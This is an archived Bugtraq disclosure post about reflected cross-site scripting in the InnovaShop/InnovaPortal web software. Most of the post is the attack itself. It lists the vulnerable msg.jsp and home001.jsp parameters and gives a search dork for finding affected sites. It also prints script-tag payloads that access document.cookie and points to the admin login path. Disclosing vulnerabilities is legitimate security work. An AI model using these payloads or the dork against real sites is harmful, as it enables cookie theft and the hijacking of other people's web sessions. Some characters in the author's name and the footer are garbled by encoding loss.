InnovaShop™® (mgs.jps) Cross Siting Scripting

From: jose luis góngora fernández <sys-project@hotmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: InnovaShop™® (mgs.jps) Cross Siting Scripting
Date:


# InnovaShop\u2122 (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Gngora Fernndez
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge\u2122" / "Powered by InnovaPortal"
# Stop lammer

# Exploit In (XSS):

http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...

# Cross Siting Scripting (Code):

<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>

# Admin Login:

http://server/admin/

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Gngora Fernndez

_________________________________________________________________
Grandes xitos, superhroes, imitaciones, cine y TV... 
http://es.msn.kiwee.com/ Lo mejor para tu mvil.





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.